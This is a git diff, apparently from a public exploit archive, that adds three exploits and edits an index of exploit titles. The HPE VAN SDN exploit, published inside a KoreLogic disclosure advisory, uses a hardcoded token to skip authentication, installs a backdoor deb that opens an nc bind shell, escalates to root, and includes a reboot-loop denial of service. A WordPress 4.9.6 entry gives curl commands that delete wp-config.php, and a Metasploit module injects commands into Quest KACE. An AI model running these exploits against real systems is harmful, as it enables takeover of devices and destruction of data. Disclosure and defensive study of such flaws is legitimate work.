diff --git a/exploits/linux/webapps/44951.py b/exploits/linux/webapps/44951.py new file mode 100755 index 000000000..f5ae5eba9 --- /dev/null +++ b/exploits/linux/webapps/44951.py @@ -0,0 +1,401 @@ +''' +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA256 + +KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability + +Title: HPE VAN SDN Unauthenticated Remote Root Vulnerability +Advisory ID: KL-001-2018-008 +Publication Date: 2018.06.25 +Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt + + +1. Vulnerability Details + + Affected Vendor: HP Enterprise + Affected Product: VAN SDN Controller + Affected Version: 2.7.18.0503 + Platform: Embedded Linux + CWE Classification: CWE-798: Use of Hard-coded Credentials, + CWE-20: Improper Input Validation + Impact: Privilege Escalation + Attack vector: HTTP + +2. Vulnerability Description + + A hardcoded service token can be used to bypass + authentication. Built-in functionality can be exploited + to deploy and execute a malicious deb file containing a + backdoor. A weak sudoers configuration can then be abused to + escalate privileges to root. A second issue can be used to + deny use of the appliance by continually rebooting it. + +3. Technical Description + + The exploit will automatically attempt to bypass authentication + unless the --no-auth-bypass flag is provided. If that flag is + provided, the --username and --password flags must also be given. + + The options for the --payload flag are: rce-root and + pulse-reboot. The default option is rce-root. The pulse-reboot + payload will reboot the target device until the attack is stopped. + + $ python hpevansdn-multiple_exploits.py --help + HPE VAN SDN Controller 2.7.18.0503 + Unauthenticated Remote Root and Denial-of-Service + + Usage: hpevansdn-multiple_exploits.py [options] + + Options: + -h, --help show this help message and exit + --target=REMOTE_IP Target IP address + --no-auth-bypass No authentication bypass + --username=USERNAME Username (Default: sdn) + --password=PASSWORD Password (Default: skyline) + --payload=PAYLOAD Payload: rce-root(default), pulse-reboot + + Below is output for the rce-root payload: + + $ python hpevansdn-multiple_exploits.py --target 1.3.3.7 + HPE VAN SDN Controller 2.7.18.0503 + Unauthenticated Remote Root and Denial-of-Service + + [+] Authentication successfully bypassed. + [-] Starting remote root exploit. + [-] Building backdoor. + [-] Uploading backdoor. + [+] Upload successful. + [-] Installing backdoor. + [+] Starting backdoor on port 49370. + [+] Connected to backdoor. + * For interactive root shell please run /var/lib/sdn/uploads/root-V6mlQNqW + id + uid=108(sdnadmin) gid=1000(sdn) groups=1000(sdn) + /var/lib/sdn/uploads/root-V6mlQNqW + root@medium-hLinux:/opt/sdn/admin# uname -a + Linux medium-hLinux 4.4.0-2-amd64-hlinux #hlinux1 SMP Thu Jan 28 12:35:26 UTC 2016 x86_64 GNU/Linux + root@medium-hLinux:/opt/sdn/admin# exit + [-] Removing backdoor. + [+] Backdoor removed. + +4. Mitigation and Remediation Recommendation + + The vendor issued the following statement: + + HPE had evaluated the impact of service token being + leaked and previously updated the security procedure in + VAN 2.8.8 Admin Guide page 129. The full guide is here - + http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-a00003662en_us-1.pdf. + + HPE expects all customers to update their service token, + admin token, default sdn user password, and edit iptables as + described in the guideline. If the guideline was followed, + the exploit would not be successful. + +5. Credit + + This vulnerability was discovered by Matt Bergin (@thatguylevel) + of KoreLogic, Inc. + +6. Disclosure Timeline + + 2018.02.16 - KoreLogic submits vulnerability details to HPE. + 2018.02.16 - HPE acknowledges receipt. + 2018.04.02 - 30 business days have elapsed since the vulnerability + was reported to HPE. + 2018.04.23 - 45 business days have elapsed since the vulnerability + was reported to HPE. + 2018.05.04 - KoreLogic requests an update on the status of the + remediation. + 2018.05.14 - 60 business days have elapsed since the vulnerability + was reported to HPE. + 2018.06.05 - 75 business days have elapsed since the vulnerability + was reported to HPE. + 2018.06.11 - KoreLogic requests an update on the status of the + remediation. + 2018.06.12 - HPE responds with the statement documented in Section + 4. Mitigation and Remediation Recommendation. + 2018.06.25 - KoreLogic public disclosure. + +7. Proof of Concept +''' + + from optparse import OptionParser + from random import randrange,choice + from threading import Thread + from os import mkdir,makedirs,system,listdir,remove + from string import ascii_letters,digits + from subprocess import check_output + from requests import get,post + from requests.utils import dict_from_cookiejar + from requests.exceptions import ConnectionError + from time import sleep + from sys import exit + from json import dumps + + ################################# + # PULSE REBOOT TIMER IN SECONDS # + pulse_timer = 60 # + ################################# + + banner = """HPE VAN SDN Controller 2.7.18.0503 + Unauthenticated Remote Root and Denial-of-Service + """.center(80) + + class Backdoor: + def __init__(self): + ###################################################################################### + # ATTACK SHELL SCRIPT # + self.backdoor_port = randrange(50000,55000) # + self.backdoor_script = """#!/bin/sh\nnc -l -p PORT -e /bin/bash &""" # DONT CHANGE # + self.backdoor_dir = '%s-1.0.0' % ''.join( # + [choice(digits + ascii_letters) for i in xrange(8)] # + ) # + self.backdoor_script = self.backdoor_script.replace('PORT',str(self.backdoor_port)) # + ###################################################################################### + self.cmd_name = ''.join([choice(digits + ascii_letters) for i in xrange(8)]) + return None + def generate(self): + print '[-] Building backdoor.' + control_template = """Source: %s + Section: misc + Priority: extra + Maintainer: None + Homepage: http://127.0.0.1/ + Version: 1.0.0 + Package: %s + Architecture: all + Depends: + Description: %s + """ % (self.backdoor_dir,self.cmd_name,self.backdoor_dir) + try: + mkdir(self.backdoor_dir) + mkdir('%s/%s' % (self.backdoor_dir,'DEBIAN')) + fp = open('%s/%s/control' % (self.backdoor_dir,'DEBIAN'),'w') + fp.write(control_template) + fp.close() + makedirs('%s/var/lib/sdn/uploads/tmp' % (self.backdoor_dir)) + fp = open('%s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name),'w') + fp.write(self.backdoor_script) + fp.close() + fp = open('%s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name),'w') + fp.write("""#!/bin/sh\nsudo -u sdn /usr/bin/sudo python -c 'import pty;pty.spawn("/bin/bash")'""") + fp.close() + system('chmod a+x %s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name)) + system('chmod a+x %s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name)) + if "dpkg-deb: building package" not in check_output( + ['/usr/bin/dpkg-deb', '--build', '%s/' % (self.backdoor_dir)] + ): + print '[!] Could not build attack deb file. Reason: DPKG failure.' + except Exception as e: + print '[!] Could not build attack deb file. Reason: %s.' % (e) + return '%s.deb' % self.backdoor_dir,self.cmd_name,self.backdoor_port + + class HTTP: + def __init__(self): + return None + def is_service_token_enabled(self): + url = 'https://%s:8443/sdn/ui/app/rs/hpws/config' % (self.target) + try: + r = get(url, headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent}, verify=False, allow_redirects=False) + if r.status_code == 200: + return True + except ConnectionError: + print '[!] Connection to target service failed.' + exit(1) + return False + def get_session_token(self): + url = 'https://%s:8443/sdn/ui/app/login' % (self.target) + try: + r = post(url, headers={"User-Agent":self.user_agent},verify=False, data="username=%s&password=%s" % (self.username,self.password), allow_redirects=False) + if r.status_code == 303: + self.session_token = dict_from_cookiejar(r.cookies)['X-Auth-Token'] + return True + except ConnectionError: + print '[!] Connection to target service failed.' + exit(1) + return False + def upload_deb(self): + print '[-] Uploading backdoor.' + url = 'https://%s:8081/upload' % (self.target) + try: + fp = open('%s' % (self.deb_name),'rb') + data = fp.read() + fp.close() + try: + r = post(url,headers={"X-Auth-Token":self.session_token,"Filename":self.deb_name,"User-Agent":self.user_agent},verify=False,data=data) + if r.status_code == 200: + print '[+] Upload successful.' + return True + else: + print '[!] Upload failed. Please try again.' + except ConnectionError: + print '[!] Connection to target service failed.' + exit(1) + except Exception as e: + print '[!] Failed to write backdoor to disk. Reason: %s.' % (e) + return False + def install_deb(self): + print '[-] Installing backdoor.' + url = 'https://%s:8081/' % (self.target) + post_body = dumps({"action":"install","name":self.deb_name}) + try: + r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body) + if r.status_code == 200: + return True + except ConnectionError: + print '[!] Connection to target service failed.' + exit(1) + return False + def start_shell(self): + print '[+] Starting backdoor on port %d.' % (self.backdoor_port) + url = 'https://%s:8081/' % (self.target) + post_body = dumps({"action":"exec","name":self.cmd_name}) + try: + r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body) + if r.status_code == 200: + return True + except ConnectionError: + print '[!] Connection to target service failed.' + exit(1) + return False + def uninstall_deb(self): + print '[-] Removing backdoor.' + url = 'https://%s:8081/' % (self.target) + post_body = dumps({"action":"uninstall","name":self.deb_name}) + try: + r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body) + if r.status_code == 200: + return True + except ConnectionError: + print '[!] Connection to target service failed.' + exit(1) + return False + def send_reboot(self): + print '[+] Sending reboot.' + url = 'https://%s:8081/' % (self.target) + post_body = dumps({"action":"reboot"}) + try: + r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body) + except ConnectionError: + print '[!] Connection to target service failed.' + exit(1) + return False + + class Exploit(HTTP): + def __init__(self,target=None,noauthbypass=None, + username=None,password=None,payload=None): + self.target = target + self.noauthbypass = noauthbypass + self.username = username + self.password = password + self.payload = payload + self.deb_name = '' + self.cmd_name = '' + self.backdoor_port = 0 + self.session_token = 'AuroraSdnToken37' + self.user_agent = choice(['Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+', + 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1', + 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)', + 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10']) + return None + def drop_root(self): + sleep(3) + print '[+] Connected to backdoor.\n\t* For interactive root shell please run /var/lib/sdn/uploads/root-%s' % (self.cmd_name) + system('nc %s %s' % (self.target,self.backdoor_port)) + return False + def run(self): + if not self.is_service_token_enabled() or self.noauthbypass == True: + print '[-] Authentication bypass failed or running with --no-auth-bypass. Attempting login.' + if not self.get_session_token(): + print '[!] Login failed. Exploit failed.' + exit(1) + else: + print '[+] Authentication successfully bypassed.' + if self.payload == 'rce-root': + print '[-] Starting remote root exploit.' + self.deb_name, self.cmd_name, self.backdoor_port = Backdoor().generate() + if self.upload_deb(): + if self.install_deb(): + Thread(target=self.start_shell,args=(),name="shell-%s" % (self.cmd_name)).start() + try: + self.drop_root() + except KeyboardInterrupt: + print '[-] Disconnecting from backdoor.' + return True + if self.uninstall_deb(): + print '[+] Backdoor removed.' + else: + print '[!] Could not remove backdoor.' + return True + else: + print '[!] Failed to install backdoor.' + exit(1) + else: + print '[!] Failed to upload backdoor.' + exit(1) + print "[-] Please remember to srm %s and the build directory %s/" % (self.deb_name,self.deb_name.replace('.deb','')) + else: + print '[-] Starting pulse reboot exploit.' + while True: + try: + self.send_reboot() + sleep(pulse_timer) + except KeyboardInterrupt: + print '[-] Reboot pulse Denial-of-Service stopped.' + break + return False + + if __name__=="__main__": + print banner + parser = OptionParser() + parser.add_option("--target",dest="remote_ip",default='',help="Target IP address") + parser.add_option("--no-auth-bypass",action="store_true",default=False,help="No authentication bypass") + parser.add_option("--username",dest="username",default="sdn",help="Username (Default: sdn)") + parser.add_option("--password",dest="password",default="skyline",help="Password (Default: skyline)") + parser.add_option("--payload",dest="payload",default='rce-root',help="Payload: rce-root(default), pulse-reboot") + o, a = parser.parse_args() + if o.remote_ip != '': + Exploit(target=o.remote_ip, + noauthbypass=o.no_auth_bypass, + username=o.username, + password=o.password, + payload=o.payload).run() + else: + print '[!] --target must be supplied.' + +''' +The contents of this advisory are copyright(c) 2018 +KoreLogic, Inc. and are licensed under a Creative Commons +Attribution Share-Alike 4.0 (United States) License: +http://creativecommons.org/licenses/by-sa/4.0/ + +KoreLogic, Inc. is a founder-owned and operated company with a +proven track record of providing security services to entities +ranging from Fortune 500 to small and mid-sized companies. We +are a highly skilled team of senior security consultants doing +by-hand security assessments for the most important networks in +the U.S. and around the world. We are also developers of various +tools and resources aimed at helping the security community. +https://korelogic.com/about-korelogic.html + +Our public vulnerability disclosure policy is available at: +https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt +-----BEGIN PGP SIGNATURE----- + +iQJOBAEBCAA4FiEETtzSIGy8wE6Vn0geUk0uR1lFz/MFAlsxL1caHGRpc2Nsb3N1 +cmVzQGtvcmVsb2dpYy5jb20ACgkQUk0uR1lFz/OLgA/+I4R5zIz93rYS6VZBbMcD +6fQYup7o9yGkjSOyhTYMWJYL1BXMJHz534OUX54/vkvhoxdkhb4ouGIYneB+lXCb +WcPHGAkk094K50z9e3OXcsw3hDNS2lfQVS9IaHxR7iae4zRk6DQQYCBYgfPhi3+5 +x9SkBV516WPM3iyu4Bgx19FTBcx3yXLRruGAftrceIiVdlUDrQbuu3Sht0oa3VBh +36mGDld7NS+vFHFJwTxbkBwodKViwDTzsYtnh0JId5ICp2a3PAR75Rwnbr+zt8SW +byD5CgA9szpSf7Sa6H8NnhGSKC47zXQ0K4uZsEJtkHqySjq0jvw1RngnIdJWnTFz +E6cEL7evsySeMKOoO1q8A0DpUigVFan3dxdaAE7uT9z2pN1RmRJglR8RiQo/L6ML +rKFhePlfsuqJon+Ux/R5XhKgT3oQbGwz/yaV1jSUujO+qqs0yI/pEIzhkj35Ovai +k9SiNQgIm8BvrIyA2nUI1xn32Pk2PFqh77gti5HVS3JExHsMPm5c3ZjKhw3/dS3d +wXeoeL7Vh+z2I0q9E2GzLSUqxh/vsYdlbcPprgH7GGsVElEhBprsw0AmNk7lh4e4 +OwKI54tp0wbRewszQp8p9bbehwD+b4uFhqpD54w48yq3Ntv3/B07OprKWjEQUQC2 +GKUgtPVRc8ZwJV+2c+MYICU= +=mzf4 +-----END PGP SIGNATURE----- +''' \ No newline at end of file diff --git a/exploits/php/webapps/44949.txt b/exploits/php/webapps/44949.txt new file mode 100644 index 000000000..4762d0621 --- /dev/null +++ b/exploits/php/webapps/44949.txt @@ -0,0 +1,24 @@ +# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability +# Date: 2018-06-27 +# Exploit Author: VulnSpy +# Vendor Homepage: http://www.wordpress.org +# Software Link: http://www.wordpress.org/download +# Version: <= 4.9.6 +# Tested on: php7 mysql5 +# CVE : + +Step 1: + +``` +curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' +``` + +Step 2: + +``` +curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' +``` + +REF: + Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ + WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/ \ No newline at end of file diff --git a/exploits/unix/remote/44950.rb b/exploits/unix/remote/44950.rb new file mode 100755 index 000000000..e305f7747 --- /dev/null +++ b/exploits/unix/remote/44950.rb @@ -0,0 +1,162 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Quest KACE Systems Management Command Injection', + 'Description' => %q{ + This module exploits a command injection vulnerability in Quest KACE + Systems Management Appliance version 8.0.318 (and possibly prior). + + The `download_agent_installer.php` file allows unauthenticated users + to execute arbitrary commands as the web server user `www`. + + A valid Organization ID is required. The default value is `1`. + + A valid Windows agent version number must also be provided. If file + sharing is enabled, the agent versions are available within the + `\\kace.local\client\agent_provisioning\windows_platform` Samba share. + Additionally, various agent versions are listed on the KACE website. + + This module has been tested successfully on Quest KACE Systems + Management Appliance K1000 version 8.0 (Build 8.0.318). + }, + 'License' => MSF_LICENSE, + 'Privileged' => false, + 'Platform' => 'unix', # FreeBSD + 'Arch' => ARCH_CMD, + 'DisclosureDate' => 'May 31 2018', + 'Author' => + [ + 'Leandro Barragan', # Discovery and PoC + 'Guido Leo', # Discovery and PoC + 'Brendan Coles', # Metasploit + ], + 'References' => + [ + ['CVE', '2018-11138'], + ['URL', 'https://support.quest.com/product-notification/noti-00000134'], + ['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities'] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x27", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl' + } + }, + 'Targets' => [['Automatic', {}]], + 'DefaultTarget' => 0)) + register_options [ + OptString.new('SERIAL', [false, 'Serial number', '']), + OptString.new('ORGANIZATION', [true, 'Organization ID', '1']), + OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152']) + ] + end + + def check + res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php')) + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance') + vprint_status 'Remote host is not a Quest KACE appliance' + return CheckCode::Safe + end + + unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/ + vprint_error 'Could not determine KACE appliance version' + return CheckCode::Detected + end + + version = Gem::Version.new res.headers['X-KACE-Version'].to_s + vprint_status "Found KACE appliance version #{version}" + + # Patched versions : https://support.quest.com/product-notification/noti-00000134 + if version < Gem::Version.new('7.0') || + (version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) || + (version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) || + (version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) || + (version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) || + (version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108')) + return CheckCode::Appears + end + + CheckCode::Safe + end + + def serial_number + return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? '' + + res = send_request_cgi('uri' => normalize_uri('common', 'about.php')) + return unless res + + res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first + end + + def exploit + check_code = check + unless [CheckCode::Appears, CheckCode::Detected].include? check_code + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + serial = serial_number + if serial.to_s.eql? '' + print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.' + return + end + vprint_status "Using serial number: #{serial}" + + print_status "Sending payload (#{payload.encoded.length} bytes)" + + vars_get = Hash[{ + 'platform' => 'windows', + 'serv' => Digest::SHA256.hexdigest(serial), + 'orgid' => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ", + 'version' => datastore['AGENT_VERSION'] + }.to_a.shuffle] + + res = send_request_cgi({ + 'uri' => normalize_uri('common', 'download_agent_installer.php'), + 'vars_get' => vars_get + }, 10) + + unless res + fail_with Failure::Unreachable, 'Connection failed' + end + + unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX') + fail_with Failure::UnexpectedReply, 'Unexpected reply' + end + + case res.code + when 200 + print_good 'Payload executed successfully' + when 404 + fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION' + when 302 + if res.headers['location'].include? 'error.php' + fail_with Failure::UnexpectedReply, 'Server encountered an error' + end + fail_with Failure::BadConfig, 'The specified SERIAL is incorrect' + else + print_error 'Unexpected reply' + end + + register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/" + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1a9af96ce..52e6725e3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -262,7 +262,7 @@ id,file,description,date,author,type,platform,port 1343,exploits/windows/dos/1343.c,"Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",dos,windows, 1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,dos,php, 1346,exploits/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",dos,windows, -1353,exploits/windows/dos/1353.py,"WinEggDropShell 1.7 - Unauthenticated Multiple Remote Stack Overflows (PoC)",2005-12-02,Sowhat,dos,windows, +1353,exploits/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Remote Stack Overflows (PoC)",2005-12-02,Sowhat,dos,windows, 1362,exploits/windows/dos/1362.html,"Mozilla Firefox 1.5 - 'history.dat' Looping (PoC)",2005-12-07,ZIPLOCK,dos,windows, 1368,exploits/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",dos,windows, 1371,exploits/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,dos,windows, @@ -332,7 +332,7 @@ id,file,description,date,author,type,platform,port 1746,exploits/linux/dos/1746.pl,"zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC)",2006-05-04,"Kamil Sienicki",dos,linux, 1748,exploits/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,dos,windows, 1749,exploits/windows/dos/1749.pl,"acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,Preddy,dos,windows, -1754,exploits/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - 'USER' Unauthenticated Remote Denial of Service",2006-05-05,Bigeazer,dos,windows, +1754,exploits/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - 'USER' Remote Denial of Service",2006-05-05,Bigeazer,dos,windows, 1757,exploits/windows/dos/1757.c,"acFTP FTP Server 1.4 - 'USER' Remote Denial of Service",2006-05-06,Omni,dos,windows, 1758,exploits/windows/dos/1758.pl,"TinyFTPD 1.4 - 'USER' Remote Buffer Overflow (Denial of Service) (PoC)",2006-05-06,[Oo],dos,windows, 1775,exploits/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - CSS Attribute Denial of Service",2006-05-10,seven,dos,windows, @@ -518,7 +518,7 @@ id,file,description,date,author,type,platform,port 3396,exploits/linux/dos/3396.php,"PHP 4.4.4 - 'Unserialize()' ZVAL Reference Counter Overflow (PoC)",2007-03-02,"Stefan Esser",dos,linux, 3399,exploits/windows/dos/3399.txt,"Netrek 2.12.0 - 'pmessage2()' Remote Limited Format String",2007-03-02,"Luigi Auriemma",dos,windows, 3404,exploits/multiple/dos/3404.php,"PHP 5 - 'wddx_deserialize()' String Append Crash",2007-03-04,"Stefan Esser",dos,multiple, -3407,exploits/multiple/dos/3407.c,"Asterisk 1.2.15/1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,dos,multiple, +3407,exploits/multiple/dos/3407.c,"Asterisk 1.2.15/1.4.0 - Remote Denial of Service",2007-03-04,fbffff,dos,multiple, 3415,exploits/linux/dos/3415.html,"Konqueror 3.5.5 - JavaScript Read of FTP Iframe Denial of Service",2007-03-05,mark,dos,linux, 3418,exploits/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - 'check' Buffer Overflow (PoC)",2007-03-06,mu-b,dos,windows, 3419,exploits/windows/dos/3419.txt,"Microsoft Windows - '.doc' Malformed Pointers Denial of Service",2007-03-06,Marsu,dos,windows, @@ -626,7 +626,7 @@ id,file,description,date,author,type,platform,port 4288,exploits/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,dos,windows, 4289,exploits/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,dos,windows, 4293,exploits/windows_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow",2007-08-18,boecke,dos,windows_x86, -4294,exploits/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Overrun (PoC)",2007-08-18,eliteboy,dos,windows, +4294,exploits/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Remote Stack Overrun (PoC)",2007-08-18,eliteboy,dos,windows, 4297,exploits/hardware/dos/4297.pl,"Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,dos,hardware, 4298,exploits/hardware/dos/4298.pl,"Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,dos,hardware, 4304,exploits/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,dos,windows, @@ -634,7 +634,7 @@ id,file,description,date,author,type,platform,port 4319,exploits/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,dos,hardware, 4335,exploits/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - 'webcam' Remote Crash",2007-08-29,wushi,dos,windows, 4337,exploits/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",dos,windows, -4344,exploits/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - 'pop3' Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,dos,windows, +4344,exploits/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - 'pop3' Remote Overflow (PoC)",2007-08-30,rgod,dos,windows, 4347,exploits/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",dos,linux, 4359,exploits/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",dos,multiple, 4369,exploits/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,dos,windows, @@ -643,7 +643,7 @@ id,file,description,date,author,type,platform,port 4379,exploits/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow (PoC)",2007-09-08,rgod,dos,windows, 4403,exploits/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,dos,windows, 4409,exploits/windows/dos/4409.html,"HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,dos,windows, -4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware, +4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPd Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware, 4432,exploits/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",dos,multiple, 4474,exploits/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow",2007-10-01,shinnai,dos,windows, 4479,exploits/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service",2007-10-01,rgod,dos,windows, @@ -678,7 +678,7 @@ id,file,description,date,author,type,platform,port 4801,exploits/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX 'Start()' Method Remote Stack Overflow",2007-12-28,shinnai,dos,windows, 4829,exploits/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)",2008-01-02,anonymous,dos,windows, 4856,exploits/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - 'no-steam' Denial of Service",2008-01-06,"Eugene Minaev",dos,multiple, -4878,exploits/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",dos,multiple, +4878,exploits/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Remote Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",dos,multiple, 4881,exploits/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,dos,solaris, 4885,exploits/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow (PoC)",2008-01-10,"Luigi Auriemma",dos,windows, 4893,exploits/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",dos,linux, @@ -737,17 +737,17 @@ id,file,description,date,author,type,platform,port 5679,exploits/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust",2008-05-27,Gogulas,dos,multiple, 5682,exploits/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,dos,windows, 5687,exploits/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,dos,windows, -5709,exploits/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,dos,windows, +5709,exploits/windows/dos/5709.pl,"freeSSHd 1.2.1 - 